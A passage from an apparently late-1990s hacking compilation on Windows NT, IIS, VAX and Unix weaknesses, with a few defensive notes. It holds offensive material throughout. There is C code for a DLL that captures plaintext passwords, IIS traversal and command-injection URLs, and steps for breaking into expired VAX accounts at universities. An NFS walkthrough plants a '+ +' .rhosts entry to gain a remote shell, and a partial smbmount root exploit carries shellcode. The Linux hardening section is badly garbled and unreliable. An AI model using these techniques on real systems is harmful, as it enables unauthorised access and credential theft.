IE clients cannot detect whether or not this negotiation process is taking place, which makes it incredibly difficult to anticipate. Furthermore, IE can't determine what server it's talking to -- that is to say, it doesn't know if the server is a valid system to negotiation with -- which means it could be a rogue system. A server could preplan an attack by precomputing a giant database of potential passwords, which can be used for comparison.
This is NOT an SMB issue, this is an NTLM issue.
EXAMPLE
The example is on the page where this was first announced. Please click here to jump to the original page.
SOLUTION
You can protect yourself right now by stopping the NTLM SSP service, and disabling it. You may do this using Control Panel | Services, but keep in mind this may adversely affect the operation of the NT system - we take no responsibility.
Microsoft knows about this problem, and is looking in to it as of March 14, 1997. Watch this page for more info.

[13.2.3] Run Local Commands with IE
--From ntsecurity.net

An icon can be embedded within a web page, which when double-clicked, may run a remote application without warning. This is NOT the same bug as the ".LNK and .URL" problem discovered recently.
According to the author, "this bug only effects Internet Explorer 3.0 users (version 4.70.1215). The problem is significantly more serious if the user is on a platform with CIFS (Windows NT 4.0 with Service Pack 1 or later installed). If this is the case, the location of the malicious executable code to be run on the victim's machine could be anywhere on the Internet. If this is not the case, the location of the machine containing the code is restricted to within the scope of Windows name resolution. For example, the host must be either on the same subnet, listed in the victim's LMHOSTS file, or listed on the victim's WINS server."
Internet Explorer enables a user to utilize a URL describing a remote directory. When clicked, the desktop moves to a Windows Explorer window -- but it's inside of Internet Explorer. If this URL is used as the basis for an <IFRAME> tag, an embedded frame can be created with what is essentially a Windows Explorer window inside. If this window is made small enough, it appears to be some sort of button, which when clicked runs a remote program. CIFS allows a machine to use the IP or hostname provided in the URL as a way of contacting the remote host containing the executable.

[13.2.4] IE can launch remote apps
--From ntsecurity.net

Microsoft Internet Explorer v3.01 has a serious bug which allows web page writers to use ".LNK" and ".URL" files to run programs on a remote computer. This bug is particularly damaging because it uses NO ActiveX, and works even when Internet Explorer is set to its highest security level. It was tested on Microsoft Internet Explorer Version 3.0 (4.70.1155) running Windows 95. Microsoft says that users running Internet Explorer 3.0 and 3.01 for Windows 95 and Windows NT are affected. It does not affect users of Internet Explorer 3.0 / 3.0a for Windows 3.1 or Internet Explorer for Macintosh 2.1 / 3.0 / 3.0a.
.URLs work in both Windows 95 and Windows NT 4.0 -- .LNK's only work in Windows 95 -- .URL files present a possibly greater danger because they can be easily created by server side scripts to meet the specific settings of a user's system. We will provide .URL files for execution in the next day or so on this page.
The "shortcuts" can be set to be minimized during execution which means that users may not even be aware that a program has been started. Microsoft's implementation of shortcuts becomes a serious concern if a webpage can tell Internet Explorer to refresh to an executable. Or worse, client side scripts (Java, JavaScript, or VBScript) can use the Explorer object to transfer a BATCH file to the target machine and then META REFRESH to that BATCH file to execute the rogue command in that file.
The META REFRESH tag can be used to execute multiple commands in sequence. This demo copies a .BAT file into your Internet Explorer cache and then runs the .BAT file. This .BAT will create a new key in your registry called "HKEY_CURRENT_USER/Software/Cybersnot". It will then open your AUTOEXEC.BAT and CONFIG.SYS in notepad. Finally, it will open REGEDIT so that you can view the key it creates. According to its author, the demo below does not destroy anything and should not cause any problems on your system. HOWEVER by downloading it, you assume complete liablity for what it may do to your system.

[13.2.5] Password Grabbing Trojans
From Jeremy Allison

I am posting this to both the Samba list and the nt-security list as I believe this information will be of interest to both groups. This message is somewhat long and contains code fragments so my apologies if this is of no interest to you (just hit delete :-). Over several years helping to write Samba and dealing with UNIX and NT integration problems one of the most common requests I have seen is some way to get a UNIX box (maybe running Samba) to act as a NT domain controller, or for some way to unify the password databases between UNIX boxes and NT Domains. The first problem is not solveable due to the amount of Microsoft proprietary information they would have to reveal, and MS are not willing to make that available. The second problem however, is more tractable. It seems in NT4.x Microsoft have finally revealed enough information to make synchronisation between UNIX and NT password databases possible.
Sync'ing from a UNIX box to an NT box was always possible, as the API's to change an NT password have always been available in the old Lanman API set, the difficulty was sync'ing NT password changes to a UNIX box, as the password change API's always seemed to go into a 'black box'to which no external access was available. It had to be possible, however, as NT Domains are perfectly capable of synchronising with Netware LANs. As the password hash mechanisms in NT and Netware are different the Netware password update mechanism had to be able to get at the plaintext password at the update time, before it got hashed and placed in the NT SAM. This mechanism is now available to other libraries on NT 4.x.
On NT 4.x there is a Key
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
and one of the defined name/value pairs is "Notification Packages" which is a Multi_string value which as shipped has a value of FPNWCLNT. This is obviously the name of a DLL (as I found it as FPNWCLNT.DLL in %SYSTEMROOT%\SYSTEM32) and logic would dictate that this was the place that the Netware password updates were done. The latest Microsoft SDK held the missing part of the puzzle, the neccessary API's that need to be in such a DLL in order for it to get password change notification. So here below, is a very simple DLL that will receive plaintext password change notifications from the NT LSA code. The sample code just logs all password change notifications to a file called C:\TEMP\PWDCHANGE.OUT, but it illustrates the technique. To test it, comple the C code and .DEF file into a DLL called pwdchange.dll, copy it to %SYSTEMROOT%\SYSTEM32 update the value
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
to read
FPNWCLNT
PWDCHANGE
(NB. The newline between the two is *important*). and then reboot the machine. Tests show that all password changes are now funnelled through this DLL with the following information, Username, Plaintext password, RID (relative domain id). More interesting is that on creation of a new user this DLL is also called, this could be used to do centralized account management by creating a new UNIX user on the fly as a new NT user is created. Such a library would be installed on the Primary domain controller for an NT domain, and will then allow all users passwords to be propagated to non-NT systems as they are changed. The useful thing about this method is that it gets called on *all* forms of password update, from using CTRL-ALT-DEL to update your password, using USERMGR to change a password, or even by using the net user <username> <password> command from the command prompt.
My own uses for this will be to keep an smbpasswd file up to date for the use by Samba, but a proposed mechanism to keep a UNIX password database in synch would be as follows:
1). Keep the notify DLL simple, as it is called in the context of an NT security system - we don't want complexity here. Just write the change information down a named pipe from the DLL.
2). Create a service, that creates the read end of the above named pipe. This service is configured with the following information, held in the registry.
a). The name of the UNIX machine and TCP port number of a process on it to communicate with.
b). A 'secret' DES key (secret in quotes as anyone with Administrator access could read it) which is used to encrypt the change notifications going across the net. This service would just read password change notifications, encrypt the data and ship it to a UNIX machine where it could be processed. This service can get as complex as we like, with queueing, retry, handshaking etc.
3). Create a UNIX daemon, running as root, listening on the TCP port named above for password change data. This daemon also needs access to the 'secret' DES key to decrypt the data (probably in a root owned and read-only be root file).
This daemon could then be configured to keep whatever databases residing on the UNIX side in sync are required. Suggestions are the UNIX password database, the Samba database, a Kerberos password database, Oracle, Sybase.... be my guest :-).
If this above daemon is written so that new change notification modules can be plugged in to it (like the PAM spec as an example) it would be flexible enough for all the above. Of course this will make any securiy expert shudder, as compromising the DES key comprmises all new password changes, but that's the price we pay for simplicity (Bruce Schneier(sp?) would definately not approve :-). Anyway enough with the pontificating, here's the code :-). (Code was written with Microsoft Visual C++ 4.x, not tested on other compilers). As always, this code has no warranty, and using it may cause your system to self destruct in 5 seconds .. .etc, etc, etc.... (hope that's enough legal-ease to protect me :-)
Some comments by: Mark Joseph Edwards
Although some people think that this exploit only works on a PDC, this is NOT so. It works just fine on NT systems installed just as a server (non-domain controller), and it also works just fine on NT Workstation. This DOESN'T work on a Backup Domain Controller, but it DOES work on a Primary Domain Controller. Also, take note that NT 4.0 and Service Pack 2 (or greater) are required for this to work on any variety of NT installation. If you want more information on this hook, see Microsoft's Knowledge Base article # Q151082, located here. You may also want to take note right here and now that the MSGINA.DLL, which is the default "Graphical Identification and Authorization" provider for the local console logon, could also be overwritten with a trojan .DLL. Once this happens, you're toast. Ouch!
Here's Jeremy's useful (non-trojan) code:
-----------------cut here-------pwdchange.c-----------------------------
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

struct UNI_STRING {
USHORT len;
USHORT maxlen;
WCHAR *buff;
};

static HANDLE fh;

BOOLEAN __stdcall InitializeChangeNotify ()
{
DWORD wrote;
fh = CreateFile("C:\\temp\\pwdchange.out",
GENERIC_WRITE,
FILE_SHARE_READ|FILE_SHARE_WRITE,
0,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL|FILE_FLAG_WRITE_THROUGH,
0);
WriteFile(fh, "InitializeChangeNotify started\n", 31, &wrote, 0);

return TRUE;
}

LONG __stdcall PasswordChangeNotify (
struct UNI_STRING *user,
ULONG rid,
struct UNI_STRING *passwd
)
{
DWORD wrote;
WCHAR wbuf[200];
char buf[512];
char buf1[200];
DWORD len;

memcpy(wbuf, user->buff, user->len);
len = user->len/sizeof(WCHAR);
wbuf[len] = 0;
wcstombs(buf1, wbuf, 199);
sprintf(buf, "User = %s : ", buf1);
WriteFile(fh, buf, strlen(buf), &wrote, 0);

memcpy(wbuf, passwd->buff, passwd->len);
len = passwd->len/sizeof(WCHAR);
wbuf[len] = 0;
wcstombs(buf1, wbuf, 199);
sprintf(buf, "Password = %s : ", buf1);
WriteFile(fh, buf, strlen(buf), &wrote, 0);

sprintf(buf, "RID = %x\n", rid);
WriteFile(fh, buf, strlen(buf), &wrote, 0);

return 0L;
}
-----------------------end of pwdchange.c------------------------------------
---------cut here-pwdchange.def----------------------------------------------
EXPORTS

InitializeChangeNotify=_InitializeChangeNotify@0
PasswordChangeNotify=_PasswordChangeNotify@12

--------------------end pwdchange.def-----------------------------------------

[13.2.6] Reverting an ISAPI Script

ISAPI scripts run under the IUSR_MACHINENAME account under IIS, and thus, inherit the security permissions of this account. However, if the ISAPI program contains a simple call labelled RevertToSelf(), you have a big hole. Once that program line is executed, the ISAPI program reverts it's authority to the all-powerful SYSTEM account, at which point the program can do just about anything, including successfully execute system() calls.
Try it yourself - this DLL runs on Intel based IIS machines. Drop it in your scripts directory, and call it without any parameters using your Web browser. (i.e.

http://www.yoursite.com/scripts/revert.dll

) It creates a directory called C:\IIS-REVERT-TEST with no trouble at all :( I tested this on an NTFS partition with no normal user permissions on the root directory.
Additionally, Laxmikant Gunda was kind enough to report to us that there is yet another way to perform this same exploit. Laxmikant offers the following:
"ISAPI DLL runs under the security context of the IUSR_MACHINENAME account under IIS, and thus inherit the security permissions of that account. However, if the ISAPI DLL can create a process using a call to CreateProcess( ). The process created inherits the security context of the powerful LocalSystem account rather than IUSR_MACHINENAME, thus creating a hole. Thus, any system process can be fired by the ISAPI DLL using this technique.
This can be tried using a generic ISAPI DLL & inserting code for CreateProcess( ) with a process name present in the system.
This behaviour is documented in MSDN library on Impersonation : "When a thread is impersonating a user, most actions by the thread are done in the security context of the thread's impersonation token rather than the primary token of the process that owns the thread. For example, an individual thread of a server process can impersonate a client to verify that the client is allowed to access a securable object. However, some actions are always done using the security context of the process. For example, if an impersonating thread calls the CreateProcess function, the new process inherits the primary token of the process rather than the impersonation token of the calling thread. Similarly, the system always uses the primary token of the process to validate actions requiring the SE_TCB_NAME privilege."

[13.2.7] Rollback.exe

The Windows NT 4.0 Server and Workstation compact discs include a utility called Rollback.exe. Rollback.exe was designed to help computer manufacturers preinstall Windows NT 4.0, and allow end-users to do the final configuration according to the desired role of the computer. Running this utility will remove all registry settings on a system and bring it back to the end of the Character Based Setup portion of the Setup program, effectively undoing everything configured by the GUI portion of Windows NT Setup.
WARNING: Do not run this file on a production system! There is no way to recover information erased by running this utility, so anything stored in the registry will be lost. This includes user account information, protocol bindings, application settings, user preferences, etc.
MORE INFORMATION
If you run Rollback.exe on a production system there is no warning that Rollback.exe removes all system registry entries. Therfore, after you run Rollback.exe there is no system to rescue or to restore as the registry and the Setup.log file no longer exist.
The only fix to this problem is to restore the entire system from a current tape back up. Emergency Repair Disk does not restore the system as it requires the Setup.log and specific registry components to be present.
Rollback.exe is on the Windows NT compact discs in the following directory:
support\deptools\<system>\

[13.2.8] Replacing System .dll's

System DLLs are called by applications and the registry, and can be replaced with trojaned/virused versions. %systemroot% and %systemroot%\system32 directories have default permissions of 'Everyone' (includes guest) set to 'Change'. This allows DLLs not in use to be replaced. DLLs in use are locked.
DLLs are run by programs at various levels during normal operation. A DLL for example can be run with SYSTEM privileges by a service while a user with normal privileges is logged on.
This is also true for the MSGINA.DLL, which is the default "Graphical Identification and Authorization" provider for the local console logon, which if replaced, could seriously compromise your entire enterprise.

[13.2.9] Renaming Executables

Executables renamed as .xxx files run as executable from command line. Executables can be renamed with any extension and run from the command prompt or batch file. Subverts filtering/download control by filename extension.
Also executables without a filename extension can be started from the command prompt or batch file, as NT will try to run the file as .COM, .EXE, .CMD, or .BAT in that order.
This leaves room for a potential trojan to be introduced into the system.

[13.3.0] Viewing ASP Scripts

DESCRIPTION
A serious security hole was found in Microsoft's Active Server Pages (ASP) by Juan T. Llibre <j.llibre@codetel.net.do>. This hole allows Web clients to download unprocessed ASP files potentially exposing user ids and passwords. ASP files are the common file type used by Microsoft's IIS and Active Server to perform server-side processing. Microsoft confirms that .HTX and .IDC files are also vulnerable.
HOW IT WORKS
To download an unprocessed ASP file, simply append a period to the asp URL. For example:

http://www.domain1.com/default.asp

becomes

http://www.domain1.com/default.asp

. With the period appendage, Internet Information Server (IIS) will send the unprocessed ASP file to the Web client, wherein the source to the file can be examined at will. If the source includes any security parameter designed to allow access to other system processes, such as an SQL database, they will be revealed.

[13.3.1] .BAT and .CMD Attacks

Sending a command line to the server, such as "

http://www.domain.com/scripts/expoit.bat?&commandA+?&commandB

" to the server, and then clicking the Stop Button on the browser will cause the server to execute DOS commands on the server's OS.
Adding a '+?&time' or '+?&date' to the end of the command, will cause the server to pause for input. Clicking the Stop Button on the browser will interrupt the server making a log entry of the command string executed.

[13.3.2] IIS /..\.. Problem

A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory. A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute a target script.
By default user 'Guest' or 'IUSR_MACHINENAME' has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.

[13.3.3] Truncated Files

A URL such as

http://www.domain.com/scripts/exploit.bat

>PATH\target.bat will create a file called "target.bat". If the file "target.bat" already exists, the file will be truncated, erasing any previous contents.

[13.3.4] SNA Holes
--From ntsecurity.net

When you attach to shared folders on an AS/400 using SNA Server, where the security level is set to 30 or higher, and security has been set on the folders to allow limited access, after the first user connects to a shared folder, all subsequent users acquire the first user's access permissions to shared folders.
This problem occurs when SNA Server is sharing a single Local APPC LU when communicating to an AS/400. The security for shared folders on the AS/400 (when security is set to level 30 or higher), is tied to the controller. In this case, the AS/400 views the controller as its Remote LU, or SNA Server's Local APPC LU.
The transaction program which supports the shared folders function on the AS/400 identifies a user based on the SNA Server Local APPC LU name being used. Therefore, if multiple SNA Server users are sharing the same Local APPC LU for use with shared folders, you are able to view each other's AS/400 folders. Due to the design of the AS/400 shared folders feature, the first shared folder's user to connect over a Local APPC LU determines the AS/400 security rights for the remaining users who connect over the same Local APPC LU.
For Microsoft' information on this, see their Knowledge Base article:

http://www.microsoft.com/kb/articles/q138/0/01.htm

DEFENSE
Create a separate LU (Local to the SNA Server) for each user and pair each LU with the AS/400's LU. Then each user accesses a separate controller and has appropriate access to shared folders. In addition, each shared folder's client application must be configured with a unique Local APPC LU alias. If you prefer to leave this field empty, the SNA Server administrator can assign a default Local APPC LU alias for each user using SNA Admin (2.x) or SNA Server Manager (3.x) configured on the user record.

[13.3.5] SYN Flooding

On your computer running the TCP/IP protocol and connected to the Internet, some or all network services are rendered unavailable and error messages such as the following appear on the network client screen:
The connection has been reset by the remote host.
This symptom of all network services being rendered unavailable may also occur on a computer running an operating system other than Windows NT, for example, Unix.
Your computer has become the target of a malicious attack known as TCP/IP "SYN Flooding" or "SYN Attacks."
"Computer hackers" can target an entire machine, or a specific TCP service such as web services. The attack is focused on the TCP protocol used by all computers on the Internet, and is not specific to the Windows NT operating system.
How SYN Flooding Works
SYN Flooding works as follows: (see also CERT(sm) Advisory CA-96.21 at

ftp://info.cert.org/pub/cert_advisories

)
- A TCP connection request (SYN) is sent to the target computer. The source IP address in the packet is "spoofed," or replaced with an address that is not in use on the Internet, or that belongs to another computer. An attacker will send many of these TCP SYNs to tie up as many resources as possible on the target computer.
- Upon receiving the connection request, the target computer allocates resources to handle and track the new connection, then responds with a "SYN-ACK". In this case, the response is sent to the "spoofed" non- existent IP address.
- No response is received to the SYN-ACK. A default-configured Windows NT 3.5x or 4.0 computer will retransmit the SYN-ACK 5 times, doubling the time-out value after each retransmission. The initial time-out value is three seconds, so retries are attempted at 3, 6, 12, 24, and 48 seconds. After the last retransmission, 96 seconds are allowed to pass before the computer gives up on receiving a response, and deallocates the resources that were set aside earlier for the connection. The total elapsed time that resources are in use is 189 seconds.
If you suspect that your computer is the target of a SYN attack, you can type the following command at a command prompt to view connections in the "SYN_RECEIVED" state:
netstat -n -p tcp
If a large number of connections are in the SYN_RECEIVED state, it is possible that the system is under attack. A network analyzer can be used to track the problem down further, and it may be necessary to contact your Internet Service Provider for assistance in attempting to trace the source.
The effect of tying up connection resources varies, depending upon the TCP/IP stack and applications listening on the TCP port. For most stacks, there is a limit on the number of connections that can be in the half-open (SYN_RECEIVED) state. Once the limit is reached for a given TCP port, the target computer responds with a reset to all further connection requests until resources are freed.

[13.3.6] Land Attack

Land Attack sends SYN packets with the same source and destination IP addresses and the same source and destination ports to a host computer. This makes it appear as if the host computer sent the packet to itself. Windows NT operates more slowly while the host computer tries to respond to itself.

[13.3.7] Teardrop

Two specially fragmented IP datagrams are sent to the victim. The first is the 0 offset fragment with a payload of size N, with the MF bit on (data content is irrelevant). The second is the last fragment (MF == 0) with a positive offset < N and with a payload of < N. The fragmented datagrams will try to realign themselves, however, the payload of the current fragment does NOT contain enough data to cover the realigning. This will cause a reboot or a halt, depending on how much physical memory you've got.

[13.3.8] Pentium Bug

When an Intel processor receives a specific invalid instruction, your computer may stop responding (hang). Your computer must be turned off and restarted to return to normal operation.

If you execute F0 0F C7 C8 on a P5 it will lock the machine up.

[14.0.0] VAX/VMS Makes a comeback (expired user exploit)

This is an explenation of a vax exploit that discover. The exploit

functions in that when a username has expired it doesnt delete the username

it just puts a new password on the username named temporary password. Until

the user can input a new password to reactivate his account. I will explain

this exploit step by step but this text is intended for a more advanced reader. Remember VAX/VMS is a very secure area to work in you can get

caught if you dont know what you are doing. Well in this text i will give

you a server that has this exploit so you can verify it yourself.

Another thing is that you need to know about how to use the telnet program

if you dont know get a guide and start learning before using this.

Step by Step explanation: (if you dont own an account on the VMS/VAX)

[14.0.1] Step 1:

Finger the users of the server if you have a finger utility, but you need one that gives you the last date login.

[14.0.2] Step 2:

Get the usernames that have an old date like a year ago, basically, something that looks expired.

[14.0.3] Step 3:

Now goto to the login screen of the server type in the username.

When it promts you for a password you will type the word temp. Now for this

moment you will be entering the vax system and it will prompt you to type a

new pssword because the password has expired. As you can see you now owned

a user priviledge account.

[14.0.4] Note:

The easiest way to find systems that are exploitable is to check universities. As we know most universities issue students usernames that fie t e ttrs oletter of their first name and thest name. Example: If your name is John Doe your username would be ouoe. So the best thing yoers ningrs uieveanittrs tod iny as foid ed putntar oer earlid` user names that have the last year or so ago.

-Props to Hellmaster for thr technique.

[15.0.0] Lin#9B>o >&u ;Sstyootjuhe gat tt lnuest lirox nsstro installed? What now? How ecurity. You need to immediately secure your se tem after installation if you want your 0-dasato (e pefeales iciyolyhaf ou ong. n rec) wHed I will try and show ways to pd local attacks. Thecks.s should work on redhat and debian, but it is primarily made forckware, the best distro out S5.p 1]tcicne/e.c/if tdThon f. e isllilintells atetaewhns dg mons to open up each time it is ru fy d epaitpblavtolaoce ho l aal tstnend oeln td ape. toosllupClnye er ace sthvi ys fatl ou% eel are not imperative repniou bunstngkiy aicking a # in front of the service] Step 2: Permissions. Make sure that your root directory is only readable to root to prevent prers from snooping. Type: . Also, make sure that only the correct owner can snoop t sough home directories. cd /home ; chmod 700 * . That sho chmod 700 /mnt ; chmod 700 /floppy ; chmod 700 /cdrom . Then you should have all the pel thectly.

*Side note: You may want to only use X-windows as rows (thats what I do), as X-win binarystod xpy it e slote a Sysmam.e o aybhmdo 7 chmodr/001/usn X1chbid ; chmod 700 /usr/X11R6/bin . <: 3C /BrvRPesseTricty. ngy pcpifo rp inca -osloanlhset whd ye gat ou get. Remember the results arc.d . Look through thosvar oue rprises erc Crvmes. tom rnt shevipcs er ncedeas needed in those files. Almost eedure call is exploitable. Its better just not to run t.

[15.0.4] Step 4: . ysysopopttllnos au ow syo wtot eeerhaarusdos are eninhewhen they login to your box. H>o petcicne/e.c/if tdd onicana stmmk a co) en f(#.$in front of the line that readstream tcp nowait roowai.telnetd

Then look 3 lines below. You will see:

#telneP>stream tcp nowait root /usr/sbinin.telnetsnoopd

Uncomment that line, and sav athe file. Then restart inetd by typeing:

ps -aux |grept the pid #)

kill -9 (pid #)

inetd

Then it should be restarted and you can tou it out by telnet and logging in , and then in another window type w to find out wndt tty you just logged into and then type: ttysnoop ttyp# . Y able to see everything that the user types in. Very effective.

[15.0.5] Step 5: 5tching them. You should of who is on your system at any given time. A good way to dos is to, if you are in X-windows-font 5x8 -file /var/log/message/mes550x80 . This will open a small xconsole window that will tel you teo is connecting to you. Keep thirner. The next step is to get tcpdump. Find it at d nsite. type tcpdump in a smaill xterm and keer corner. What that will do is show ys evee sttgl clineleioontoctoun Su y a. cochecs onnnfrti es ryomorvery port.

[15.0Misc security programs.

-SSH : Secure shell-e his program is a replacesolnP>, >t

more servers are uss g this everday because o>f reck os.haf erur O, coe semoth srevetetherver 4/at you

are telneting to s well for it to work =)

k =) :ghogar S Luriny-echiitpr Tras isogasm al b aicP>ly>rcustomizable and provides roviP>Y<@:customde provides that extra edge of security

to your login sequence.

-COPS : Computer Oracle and Password System- This nice little

program automatically scans your system for

misconfigurations and warns you of the weaknesses. Its an

an excellent way to systematically check for file

permission mistakes.

By following the above steps, you have stopped about 99.8% of all hackers breaking into your system (Just hope you dont meet up with some russian hacker =) You will be invincible on IRC. Considering in all my time with Linux, Ive never been hacked. Peace out.

-Phreak-0 (Phreak_0@hotmail.com)

Thanks to Phreak-0 for that portion.

[16.0.0] Unix Techniques. New and Old.

[16.0.1] ShowMount Technique

This is an old school technique that most hackers don’t know. The two commands you need to learn are showmount and mount.

They are used in the following way:

Intercore:~#mount server.com:/remotefolder /localfolder

After you issue the command then do cd /localfolder and you will be on the remote computers shared folder. The remotefolder is the folder of the remote system that you want to mount. The localfolder is where you want the remote folder to appear to be on your system. So if you do mount server:/remote /mnt then when you are on your local system you can do cd /mnt and browse around inside that folder. The contents of that folder will be the contents of the remote folder that you shared.

[16.0.2] DEFINITIONS:

showmount lists all the clients that have remotely mounted a filesystem from host. This information is maintained by the mountd server on host, and is saved across crashes in the file /etc/rmtab.

-e Print the list of shared file systems.

mount attaches a file system to the file system hierarchy at the mount_point, which is the pathname of a directory. If mount_point has any contents prior to the mount operation, these are hidden until the file system is unmounted.

umount unmounts a currently mounted file system, which may be specified either as a mount_point or as special, the device on which the file system resides.

rhosts The files specify remote hosts and users that are considered trusted. Trusted users are allowed to access the local system without supplying a password. The remote authentication procedure determines whether a user from a remote host should be allowed to access the local system with the identity of a local user. This procedure first checks the /etc/hosts.equiv file and then checks the .rhosts file in the home directory of the local user who is requesting access. Entries in these files can be of two forms. Positive entries allow access, while negative entries deny access. The authentication succeeds when

a matching positive entry is found.

hostname [username]

The special character `+' can be used in place of either hostname or username to match any host or user. For example, the entry

+ +

gives any user at any host access to the shell without supplying a password.

rpcinfo makes an RPC call to an RPC server and reports what it finds. In the first synopsis, rpcinfo lists all the registered RPC services with rpcbind on host.

rpcinfo -p [host]

A showmount on ninja.com would look like this:

InterCore:/home/chameleon/ $/usr/sbin/showmount -e

www.ninja.com

export list for

www.ninja.com:

/home Everyone

/usr elite.ninja.com

/var samuri.ninja.com

InterCore:/home/chameleon/ $

The first section is the folder name. The section part is who has access. If it says Everyone then anyone at all can access that folder. If it has an address like elite.ninja.com only people from elite.ninja.com can access that folder. If there is a users folder shared or a home folder etc… that is shared to everyone then you can gain a user account to the system. You would do the following. Say we use ninja.com as an example. We earlier saw that we have access to /home we would then mount /home and goto a users directory and create us an rlogin for the system. The attack would be as follows.

InterCore:/home/chameleon$ /usr/sbin/showmount -e

www.ninja.com

export list for

www.ninja.com:

/home Everyone

/usr elite.ninja.com

/var samuri.ninja.com

Now, you must su to root to have access to mount things to various folders on the system.

InterCore:/home/chameleon/ $su

Password:

InterCore:/home/chameleon#

InterCore:/home/chameleon# mount

www.ninja.com:/home

/mnt

InterCore:# cd /mnt

InterCore:/mnt/ # ls

jmwaller paget pamcourt papabear parsetru pathenry patsyk paulavic

pa1230 paintere pamdon papas partsman patio patti778 pauld

pac paintroc pamelaj pappabea pataiki patj pattic pauline

packers paiyn pamelat papryor pataul patjohn pattie paulj

paddock pal pamh paris1 patbrady patmon pattil paull1

padgettr paladin pamomary parkerh patc patmraz pattygae paulpj

What you are looking at here is the contents of

www.ninja.com's

home dir.

Now lets add one of their users to our passfile, so we can become them.

InterCore:# pico /etc/passwd

add the lines:

pamcourt::200:10023:Pam Court:/home/chameleon/mnt/pamcourt/:/bin/bash

^---we put this as the home dir, because this is where the mounted home directory is located.

now, login locally as pamcourt

InterCore:/mnt/home/pamcourt/$ whoami

pamcourt

InterCore:/mnt/home/pamcourt/$ echo "+ +" > ~/.rhosts

This will make the rhosts entry as ++, which means anyone can remotely issue commands from it. Now, we remotely login to ninja.com as pamcourt

InterCore:/mnt/home/pamcourt/$rsh -l pamcourt

www.ninja.com

csh -i

Welcome to ninja.com

We are lame and left open a filesharing backdoor.

You therefore have a shell on ninja.com. The rsh and rlogin syntax is as follows:

rsh [ -l login ] [ -n ] host command

rlogin [ -E | -ex ] [ -l username ] [ -8 ] [ -L ] host

That is how to gain a user account onto a remote system. Also if you can spoof your dns or maybe the server has a router on it etc… that you can bounce through you could therefore access any files that are shared to that restricted host. Ex: in our above example if we spoofed as elite.ninja.com we would then have access to /usr. Although this technique is old it still works on many servers. So learn it and use it.

To check if a server has filesharing do: rpcinfo -p server.com

terra:/home/m/mgi/.noid $rpcinfo -p oberon.calstatela.edu

program vers proto port service

100000 4 tcp 111 rpcbind

100000 3 tcp 111 rpcbind

100000 2 udp 111 rpcbind

100004 2 udp 713 ypserv

100004 2 tcp 714 ypserv

100003 2 udp 2049 nfs

If it has a like the above one that says nfs, then it has filesharing.

[16.0.3] COMPARISION TO THE MICROSOFT WINDOWS FILESHARING

NBTSTAT –a

www.ninja.com

would show the NetBIOS Statistics which includes shared folders (directories)

C:\nbtstat –A 204.73.131.11

NetBIOS Remote Machine Name Table

Name Type Status

---------------------------------------------

STUDENT1 <20> UNIQUE Registered

STUDENT1 <00> UNIQUE Registered

DOMAIN1 <00> GROUP Registered

DOMAIN1 <1C> GROUP Registered

DOMAIN1 <1B> UNIQUE Registered

STUDENT1 <03> UNIQUE Registered

DOMAIN1 <1E> GROUP Registered

DOMAIN1 <1D> UNIQUE Registered

..__MSBROWSE__.<01> GROUP Registered

MAC Address = 00-C0-4F-C4-8C-9D

C:\net view 204.73.131.11

Shared resources at 204.73.131.11

Share name Type Used as Comment

------------------------------------------------------------------------------

NETLOGON Disk Logon server share

Test Disk

The command completed successfully.

C:\net use x: \\204.73.131.11\test

The command completed successfully.

[16.0.4] SMBXPL.C

The default parameters to the program

often work, however I have found that the offset parameter sometimes

varies wildly, values between -600 and -100 usually work though, a quick

shell script will scan through these.

** smbexpl -- a smbmount root exploit under Linux

** Author: Gerald Britton <gbritton@nih.gov>

** This code exploits a buffer overflow in smbmount from smbfs-2.0.1.

** The code does not do range checking when copying a username from

** the environment variables USER or LOGNAME. To get this far into

** the code we need to execute with dummy arguments of a server and a

** mountpoint to use (./a in this case). The user will need to create

** the ./a directory and then execute smbexpl to gain root. This code

** is also setup to use /tmp/sh as the shell as bash-2.01 appears to

** do a seteuid(getuid()) so /bin/sh on my system won't work. Finally

** a "-Q" (an invalid commandline argument) causes smbmount to fail when

** parsing args and terminate, thus jumping into our shellcode.

** The shellcode used in this program also needed to be specialized as

** smbmount toupper()'s the contents of the USER variable. Self modifying

** code was needed to ensure that the shellcode will survive toupper().

** The quick fix for the security problem:

** chmod -s /sbin/smbmount

** A better fix would be to patch smbmount to do bounds checking when

** copying the contents of the USER and LOGNAME variables.

#include <stdlib.h>

#include <stdio.h>

#define DEFAULT_OFFSET -202

#define DEFAULT_BUFFER_SIZE 211

#define DEFAULT_ALIGNMENT 2

#define NOP 0x90

/* This shell code is designed to survive being filtered by toupper() */

char shellcode[] =

"\xeb\x20\x5e\x8d\x46\x05\x80\x08\x20\x8d\x46\x27\x80\x08\x20\x40"

"\x80\x08\x20\x40\x80\x08\x20\x40\x40\x80\x08\x20\x40\x80\x08\x20"

"\xeb\x05\xe8\xdb\xff\xff\xff"

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"

"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

"\x80\xe8\xdc\xff\xff\xff/tmp/sh";

unsigned long get_sp(void) {

__asm__("movl %esp,%eax");

}

void main(int argc, char *argv[]) {

char *buff, *ptr;

long *addr_ptr, addr;

int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;

int alignment=DEFAULT_ALIGNMENT;

int i;

if (argc > 1) bsize = atoi(argv[1]);

if (argc > 2) offset = atoi(argv[2]);

if (argc > 3) alignment = atoi(argv[3]);

printf("bsize=%d offset=%d alignment=%d\n",bsize,offset,alignment);

if (!(buff = malloc(bsize))) {

printf("Can't allocate memory.\n");

exit(0);

}

addr = get_sp() - offset;

fprintf(stderr,"Using address: 0x%x\n", addr);

ptr = buff;

addr_ptr = (long *) (ptr+alignment);

for (i = 0; i < bsize-alignment; i+=4)

*(addr_ptr++) = addr;

for (i = 0; i < bsize/2; i++)

buff[i] = NOP;

ptr = buff + (128 - strlen(shellcode));

for (i = 0; i < strlen(shellcode); i++)

*(ptr++) = shellcode[i];

buff[bsize - 1] = '\0';

setenv("USER",buff,1);

